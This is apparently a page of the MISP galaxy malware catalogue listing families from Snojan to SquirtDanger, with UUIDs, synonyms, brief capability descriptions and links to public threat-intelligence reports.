- https://medium.com/csis-techblog/chapter-1-from-gozi-to-isfb-the-history-of-a-mythical-malware-family-82e592577fef - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Snojan
Internal MISP references
UUID 0646a6eb-1c13-4d87-878e-9431314597bf
which can be used as unique global reference for Snojan
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SnowFlake Stealer
Information stealer, written in Rust.
Internal MISP references
UUID 7ddfdf14-ec97-48ea-88a6-055147583dc3
which can be used as unique global reference for SnowFlake Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SNS Locker
Internal MISP references
UUID 99a10948-d7ba-4ad0-b73c-c7762143a193
which can be used as unique global reference for SNS Locker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sobaken
According to ESET, this RAT was derived from (the open-source) Quasar RAT.
Internal MISP references
UUID 81e4fc8f-7b05-42bf-8ff9-568362d4f964
which can be used as unique global reference for Sobaken
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sobig
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sobig.
Known Synonyms |
---|
Palyh |
Internal MISP references
UUID 4e9f85e7-0575-40e5-8799-288ec28237ca
which can be used as unique global reference for Sobig
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Socelars
Socelars is an infostealer with a main focus on:
- Facebook Stealer (ads/manager)
- Cookie Stealer | AdsCreditCard {Amazon}
Internal MISP references
UUID 4366ea63-b784-428c-bb00-89ee99eaf8c3
which can be used as unique global reference for Socelars
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.socelars - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://twitter.com/VK_Intel/status/1201584107928653824 - webarchive
- https://www.bleepingcomputer.com/news/security/facebook-ads-manager-targeted-by-new-info-stealing-trojan/ - webarchive
- https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html - webarchive
- https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sockbot
Sockbot is a customized fork, written in Go, of the open-source Ligolo reverse tunneling tool. Several modifications were made by the threat actors who rewrote the code, e.g. execution checks and hardcoded values. Ligolo: https://github.com/sysdream/ligolo
Internal MISP references
UUID b477dcfb-281c-4bef-9a23-f004ebe5a465
which can be used as unique global reference for Sockbot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sockbot - webarchive
- https://www.youtube.com/watch?v=CAMnuhg-Qos - webarchive
- https://www.bleepingcomputer.com/news/security/hackers-fork-open-source-reverse-tunneling-tool-for-persistence/ - webarchive
- https://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html - webarchive
- https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Socks5 Systemz
The Socks5 Systemz malware is a proxy botnet distributed via the PrivateLoader and Amadey loaders. Active since at least 2016, this botnet infects devices to use them as proxies for malicious activities, offering access for prices ranging from $1 to $140 per day in cryptocurrency. It employs a domain generation algorithm (DGA) to evade detection and enhance its resilience. Persistence is maintained through a Windows service named ContentDWSvc, with the malware injected into memory via a file called previewer.exe. To date, it has compromised approximately 10,000 devices globally, excluding Russia.
Internal MISP references
UUID 38734f44-ebc4-4250-a20e-5dac0fb5c0ed
which can be used as unique global reference for Socks5 Systemz
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.socks5_systemz - webarchive
- https://www.bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey - webarchive
- https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey - webarchive
- https://any.run/cybersecurity-blog/crackedcantil-breakdown/ - webarchive
- https://csirtasobancaria.com/nueva-actividad-del-backdoor-socks5systemz - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SocksBot
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SocksBot.
Known Synonyms |
---|
BIRDDOG |
Nadrac |
Internal MISP references
UUID da34bf80-6dc6-4b07-8094-8bed2c1176ec
which can be used as unique global reference for SocksBot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.socksbot - webarchive
- https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf - webarchive
- https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html - webarchive
- https://www.accenture.com/t00010101T000000Z__w__/gb-en/_acnmedia/PDF-83/Accenture-Goldfin-Security-Alert.pdf - webarchive
- https://threatminer.org/report.php?q=Accenture-Goldfin-Security-Alert.pdf&y=2018 - webarchive
- https://assets.sentinelone.com/sentinellabs22/sentinellabs-blackbasta - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SodaMaster
This is a RAT that is usually loaded via one or more shellcode and/or reflective DLL injection techniques. The RAT uses RC4 or a hardcoded RSA key for traffic encryption/decryption. Its communication can happen either via a raw TCP socket or via an HTTP POST request. Depending on the version, the RAT may remotely execute DLLs or shellcode.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SodaMaster.
Known Synonyms |
---|
DelfsCake |
HEAVYPOT |
dfls |
Internal MISP references
UUID 016ea180-ec16-48ce-88ea-c78d8db369d5
which can be used as unique global reference for SodaMaster
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sodamaster - webarchive
- https://securelist.com/apt-trends-report-q1-2021/101967/ - webarchive
- https://www.bleepingcomputer.com/news/security/chinese-hackers-abuse-vlc-media-player-to-launch-malware-loader/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks - webarchive
- https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf - webarchive
- https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader - webarchive
- https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Solar
Internal MISP references
UUID 1a11c0a9-8ab8-4e98-a7e6-e575eba33c93
which can be used as unique global reference for Solar
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Solarbot
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Solarbot.
Known Synonyms |
---|
Napolar |
Internal MISP references
UUID d61a1656-9413-46de-bd19-c7fe5eda3371
which can be used as unique global reference for Solarbot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.solarbot - webarchive
- https://www.welivesecurity.com/2013/09/25/win32napolar-a-new-bot-on-the-block/ - webarchive
- https://blog.avast.com/2013/09/25/win3264napolar-new-trojan-shines-on-the-cyber-crime-scene/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2013/09/new-solarbot-malware-debuts-creator-publicly-advertising/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
solarmarker
Unit 42 notes that they identified a new version of SolarMarker, a malware family known for its infostealing and backdoor capabilities, mainly delivered through search engine optimization (SEO) manipulation to convince users to download malicious documents.
Some of SolarMarker’s capabilities include the exfiltration of auto-fill data, saved passwords and saved credit card information from victims’ web browsers. Besides capabilities typical for infostealers, SolarMarker has additional capabilities such as file transfer and execution of commands received from a C2 server.
The malware invests significant effort into defense evasion, which consists of techniques like signed files, huge files, impersonation of legitimate software installations and obfuscated PowerShell scripts.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular solarmarker.
Known Synonyms |
---|
Jupyter |
Polazert |
Yellow Cockatoo |
Internal MISP references
UUID 4e08d816-9fe3-42ae-b7e4-f7182445f304
which can be used as unique global reference for solarmarker
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.solarmarker - webarchive
- https://embeeresearch.io/shodan-censys-queries/ - webarchive
- https://security5magics.blogspot.com/2020/12/tracking-jupyter-malware.html - webarchive
- https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction - webarchive
- https://embee-research.ghost.io/shodan-censys-queries/ - webarchive
- https://hunt.io/blog/solarmarker-hunt-insight-and-findings - webarchive
- https://blog.talosintelligence.com/2021/07/threat-spotlight-solarmarker.html#more - webarchive
- https://unit42.paloaltonetworks.com/solarmarker-malware/ - webarchive
- https://www.binarydefense.com/mars-deimos-from-jupiter-to-mars-and-back-again-part-two/ - webarchive
- https://www.recordedfuture.com/exploring-the-depths-of-solarmarkers-multi-tiered-infrastructure - webarchive
- https://blog.minerva-labs.com/new-iocs-of-jupyter-stealer - webarchive
- https://squiblydoo.blog/2022/09/27/solarmarker-the-old-is-new/ - webarchive
- https://blogs.vmware.com/security/2023/11/jupyter-rising-an-update-on-jupyter-infostealer.html - webarchive
- https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/ - webarchive
- https://www.binarydefense.com/mars-deimos-solarmarker-jupyter-infostealer-part-1/ - webarchive
- https://squiblydoo.blog/2021/06/20/mars-deimos-from-jupiter-to-mars-and-back-again-part-two/ - webarchive
- https://twitter.com/MsftSecIntel/status/1403461397283950597 - webarchive
- https://blogs.blackberry.com/en/2022/01/threat-thursday-jupyter-infostealer-is-a-master-of-disguise - webarchive
- https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/ - webarchive
- https://www.esentire.com/security-advisories/hackers-flood-the-web-with-100-000-malicious-pages-promising-professionals-free-business-forms-but-are-delivering-malware-reports-esentire - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/ta569-socgholish-and-beyond - webarchive
- https://www.cisecurity.org/insights/blog/top-10-malware-march-2022 - webarchive
- https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-solarmarker - webarchive
- https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer - webarchive
- https://www.prodaft.com/m/reports/Solarmarker_TLPWHITEv2.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SolidBit
Ransomware, written in .NET.
Internal MISP references
UUID 94b4f63b-48c9-4f43-b145-c967f173d87d
which can be used as unique global reference for SolidBit
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SombRAT
Internal MISP references
UUID 2b2cffc5-bf6e-4636-a906-829c32115655
which can be used as unique global reference for SombRAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sombrat - webarchive
- https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-alert-financially-motivated-aggressive-group-carrying-out-ransomware-campaigns-active-iocs - webarchive
- https://blogs.blackberry.com/en/2021/05/threat-thursday-sombrat-always-leave-yourself-a-backdoor - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Somnia
Internal MISP references
UUID 907ed2ce-5407-4e4d-9b1a-596d5489b008
which can be used as unique global reference for Somnia
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sorano
Internal MISP references
UUID 897985dc-6b3e-4d92-bbe4-c4902194cdcc
which can be used as unique global reference for Sorano
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
soraya
Internal MISP references
UUID 26aa3c43-5049-4a2e-bec1-9709b31a1a26
which can be used as unique global reference for soraya
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SoreFang
Internal MISP references
UUID 0068e2fe-0d13-4073-be73-90118b1d285a
which can be used as unique global reference for SoreFang
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sorefang - webarchive
- https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a - webarchive
- https://securelist.com/apt-trends-report-q3-2020/99204/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sorgu
Internal MISP references
UUID bc135ba5-637b-46c9-94fc-2eef5e018bb5
which can be used as unique global reference for Sorgu
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Soul
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Soul.
Known Synonyms |
---|
SoulSearcher |
Internal MISP references
UUID f7e3b124-ad70-4456-9aff-3ec501e8c42d
which can be used as unique global reference for Soul
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.soul - webarchive
- https://research.checkpoint.com/2023/pandas-with-a-soul-chinese-espionage-attacks-against-southeast-asian-government-entities/ - webarchive
- https://www.fortinet.com/blog/threat-research/unraveling-the-evolution-of-the-soul-searcher-malware - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SOUNDBITE
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SOUNDBITE.
Known Synonyms |
---|
denis |
Internal MISP references
UUID f4cac204-3d3f-4bb6-84bd-fc27b2f5158c
which can be used as unique global reference for SOUNDBITE
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite - webarchive
- https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection - webarchive
- https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html - webarchive
- https://mp.weixin.qq.com/s/xPsEXp2J5IE7wNSMEVC24A - webarchive
- https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-1/ - webarchive
- https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx - webarchive
- https://www.secureworks.com/research/threat-profiles/tin-woodlawn - webarchive
- https://attack.mitre.org/wiki/Software/S0157 - webarchive
- https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SpaceColon
According to ESET, Spacecolon is a collection of malware written in Delphi, consisting of ScRansom, ScHackTool, ScInstaller, ScService, and ScPatcher.
Internal MISP references
UUID be9addb2-2caf-476c-8d50-c9803d997af6
which can be used as unique global reference for SpaceColon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SPACESHIP
SPACESHIP searches for files with a specified set of file extensions and copies them to a removable drive. FireEye believes that SHIPSHAPE is used to copy SPACESHIP to a removable drive, which could then be used to infect another victim computer, including an air-gapped one. SPACESHIP is then used to steal documents from the air-gapped system, copying them to a removable drive inserted into the SPACESHIP-infected system.
Internal MISP references
UUID 813e2761-6d68-493f-846b-2fc86d2e8079
which can be used as unique global reference for SPACESHIP
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Spark
Internal MISP references
UUID 3c676c22-8041-4cf6-8291-1bb9372e2d45
which can be used as unique global reference for Spark
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.spark - webarchive
- https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf - webarchive
- https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign - webarchive
- https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/ - webarchive
- https://www.cybereason.com/blog/new-cyber-espionage-campaigns-targeting-palestinians-part-one - webarchive
- https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sparkle
Internal MISP references
UUID 339c60f6-8758-4d32-aa33-b0d722e924bb
which can be used as unique global reference for Sparkle
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sparksrv
Internal MISP references
UUID 1937c3e0-569d-4eb4-b769-ae5d9cc27755
which can be used as unique global reference for Sparksrv
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SparkRAT
Internal MISP references
UUID 55c6dce3-650b-4f67-8b47-5f6cd0acb72c
which can be used as unique global reference for SparkRAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.spark_rat - webarchive
- https://asec.ahnlab.com/ko/56715/ - webarchive
- https://www.clearskysec.com/0d-vulnerability-exploited-in-the_wild/ - webarchive
- https://blog.exatrack.com/melofee/ - webarchive
- https://asec.ahnlab.com/en/52899/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/ - webarchive
- https://www.sentinelone.com/labs/dragonspark-attacks-evade-detection-with-sparkrat-and-golang-source-code-interpretation/ - webarchive
- https://github.com/XZB-1248/Spark - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SparrowDoor
Internal MISP references
UUID 412a1b1b-77b1-4149-b7bd-14a43aa40dda
which can be used as unique global reference for SparrowDoor
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sparrow_door - webarchive
- https://www.welivesecurity.com/2021/09/23/famoussparrow-suspicious-hotel-guest/ - webarchive
- https://www.ncsc.gov.uk/files/NCSC-MAR-SparrowDoor.pdf - webarchive
- https://www.virusbulletin.com/conference/vb2023/abstracts/unveiling-activities-tropic-trooper-2023-deep-analysis-xiangoop-loader-and-entryshell-payload/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Spartacus
Spartacus is ransomware written in .NET and emerged in the first half of 2018.
Internal MISP references
UUID e4dce19f-bb8e-4ea1-b771-58b162946f29
which can be used as unique global reference for Spartacus
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Spereal
Internal MISP references
UUID d386150b-4be2-4541-ae70-5a6cf227f119
which can be used as unique global reference for Spereal
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SPECTRALVIPER
Internal MISP references
UUID 4f9ee4dc-725e-4a8e-8c10-a013f6949b2d
which can be used as unique global reference for SPECTRALVIPER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Spectre Rat
A mixed RAT and botnet malware sold on underground forums. In March 2021 it was advertised as Spectre 2.0; it reached version 3 in June 2021 and then, quickly, version 4. This crimeware tool was being abused in malicious campaigns targeting European users in September 2021.
Internal MISP references
UUID 0d0935cc-d98f-4a0e-8e13-f36358e974b4
which can be used as unique global reference for Spectre Rat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Spedear
Internal MISP references
UUID bd29030e-d440-4842-bc2a-c173ed938da4
which can be used as unique global reference for Spedear
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SPHijacker
According to Trend Micro, this is a tool designed to disable security products, adopting two approaches to achieve this purpose. One approach terminates the security product process by using a vulnerable driver, zamguard64.sys, published by Zemana (vulnerability designated as CVE-2018-5713). Meanwhile, another approach disables process launching by using a new technique that they named stack rumbling.
Internal MISP references
UUID 24541e4c-27b3-4a80-9dca-972f9825d36b
which can be used as unique global reference for SPHijacker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SPICA
Internal MISP references
UUID e974faa2-107b-4a63-b10f-7b5936bf263f
which can be used as unique global reference for SPICA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Spicy Hot Pot
Internal MISP references
UUID dfbe088e-dd6d-4bad-8e2b-7a4162034da4
which can be used as unique global reference for Spicy Hot Pot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SPIDERPIG RAT
Internal MISP references
UUID 70d271b7-2dcc-4b4f-94a5-9ea4b2165510
which can be used as unique global reference for SPIDERPIG RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.spider_rat - webarchive
- https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_8_hara_en.pdf - webarchive
- https://twitter.com/nahamike01/status/1471496800582664193?s=20 - webarchive
- https://jp.security.ntt/resources/EN-BlackTech_2021.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
splitloader
Internal MISP references
UUID dda86498-6a45-47c5-b9e4-0816c31765f5
which can be used as unique global reference for splitloader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Spora
Internal MISP references
UUID 7eeafa7c-0282-4667-bb1a-5ebc3a845d6d
which can be used as unique global reference for Spora
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.spora_ransom - webarchive
- https://www.linkedin.com/pulse/spora-ransomware-understanding-hta-infection-vector-kevin-douglas - webarchive
- https://blog.malwarebytes.com/threat-analysis/2017/03/spora-ransomware/ - webarchive
- https://nakedsecurity.sophos.com/2017/06/26/how-spora-ransomware-tries-to-fool-antivirus/ - webarchive
- http://malware-traffic-analysis.net/2017/01/17/index2.html - webarchive
- https://github.com/MinervaLabsResearch/SporaVaccination - webarchive
- https://www.gdatasoftware.com/blog/2017/01/29442-spora-worm-and-ransomware - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SpyBot
Internal MISP references
UUID 34e9d701-22a1-4315-891d-443edd077abf
which can be used as unique global reference for SpyBot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Spyder
Internal MISP references
UUID bcee00e4-5316-45ad-8811-33c50b9394f8
which can be used as unique global reference for Spyder
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.spyder - webarchive
- https://www.youtube.com/watch?v=-7Swd1ZetiQ - webarchive
- https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques - webarchive
- https://securitynews.sonicwall.com/xmlpost/chinas-winnti-spyder-module/ - webarchive
- https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf - webarchive
- https://vms.drweb.com/virus/?i=23648386 - webarchive
- https://www.cybereason.com/blog/operation-cuckoobees-a-winnti-malware-arsenal-deep-dive - webarchive
- https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021 - webarchive
- https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf - webarchive
- https://st.drweb.com/static/new-www/news/2021/march/BackDoor.Spyder.1_en.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Spyder Patchwork
Internal MISP references
UUID d16712eb-7f4c-4810-aadd-18db9036ec17
which can be used as unique global reference for Spyder Patchwork
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SpyEye
SpyEye is a malware family targeting both Microsoft Windows browsers and Apple iOS Safari. Originating in Russia, it was sold on underground forums for $500 and up, billed as "The Next Zeus Malware". It offered functionality typical of banking trojans: keylogging, credit-card auto-fill modules, email backups, encrypted config files, HTTP access, POP3 grabbers and FTP grabbers. SpyEye allowed attackers to steal money from online bank accounts and initiate transactions even while the legitimate user was logged into the account.
Internal MISP references
UUID 814fa0b7-0468-4ed0-b910-2b3caec96d44
which can be used as unique global reference for SpyEye
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.spyeye - webarchive
- https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FSpyeye - webarchive
- https://www.pcworld.com/article/247252/spyeye_malware_borrows_zeus_trick_to_mask_fraud.html - webarchive
- https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree - webarchive
- https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals - webarchive
- https://krebsonsecurity.com/2010/04/spyeye-vs-zeus-rivalry/ - webarchive
- https://www.symantec.com/connect/blogs/spyeye-bot-versus-zeus-bot - webarchive
- https://securelist.com/financial-cyberthreats-in-2020/101638/ - webarchive
- https://www.computerworld.com/article/2509482/spyeye-trojan-defeating-online-banking-defenses.html - webarchive
- https://www.sans.org/reading-room/whitepapers/malicious/clash-titans-zeus-spyeye-33393 - webarchive
- https://krebsonsecurity.com/2010/09/spyeye-botnets-bogus-billing-feature/ - webarchive
- https://krebsonsecurity.com/2011/04/spyeye-targets-opera-google-chrome-users/ - webarchive
- http://malwareint.blogspot.com/2010/02/spyeye-bot-part-two-conversations-with.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SquidLoader
Internal MISP references
UUID e9a3bc19-e7e7-4cce-8dd1-8b59e87b9522
which can be used as unique global reference for SquidLoader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Squirrelwaffle
According to Sophos, Squirrelwaffle is a malware loader distributed as a malicious Office document in spam campaigns. It provides attackers with an initial foothold in a victim's environment and a channel to deliver and install other malware. When a recipient opens a Squirrelwaffle document and enables macros, a Visual Basic script typically downloads and executes malicious files and scripts, handing further control of the computer to the attacker. Squirrelwaffle operators also use DocuSign branding to try to trick the user into enabling macros in the Office document.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Squirrelwaffle.
Known Synonyms |
---|
DatopLoader |
Internal MISP references
UUID cdbfd973-fa96-4e64-b2a3-9d51460fd7af
which can be used as unique global reference for Squirrelwaffle
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.squirrelwaffle - webarchive
- https://redcanary.com/blog/intelligence-insights-december-2021 - webarchive
- https://security-soup.net/squirrelwaffle-maldoc-analysis/ - webarchive
- https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf - webarchive
- https://blogs.blackberry.com/en/2021/11/threat-thursday-squirrelwaffle-loader - webarchive
- https://blog.minerva-labs.com/a-new-datoploader-delivers-qakbot-trojan - webarchive
- https://www.malware-traffic-analysis.net/2021/09/17/index.html - webarchive
- https://github.com/0xjxd/SquirrelWaffle-From-Maldoc-to-Cobalt-Strike/raw/main/2021-10-02%20-%20SquirrelWaffle%20-%20From%20Maldoc%20to%20Cobalt%20Strike.pdf - webarchive
- https://news.sophos.com/en-us/2022/02/15/vulnerable-exchange-server-hit-by-squirrelwaffle-and-financial-fraud/ - webarchive
- https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot - webarchive
- https://www.youtube.com/watch?v=9X2P7aFKSw0 - webarchive
- https://twitter.com/Max_Mal_/status/1442496131410190339 - webarchive
- https://redcanary.com/blog/intelligence-insights-november-2021/ - webarchive
- https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike - webarchive
- https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-custom-packer/ - webarchive
- https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-main-loader/ - webarchive
- https://twitter.com/jhencinski/status/1464268732096815105 - webarchive
- https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike - webarchive
- https://elis531989.medium.com/the-squirrel-strikes-back-analysis-of-the-newly-emerged-cobalt-strike-loader-squirrelwaffle-937b73dbd9f9 - webarchive
- https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-newest-malicious-actor-squirrelwaffle-malicious-doc/ - webarchive
- https://www.sentinelone.com/blog/is-squirrelwaffle-the-new-emotet-how-to-detect-the-latest-malspam-loader/ - webarchive
- https://certitude.consulting/blog/en/unpatched-exchange-servers-distribute-phishing-links-squirrelwaffle/ - webarchive
- https://www.cynet.com/understanding-squirrelwaffle/ - webarchive
- https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SquirtDanger
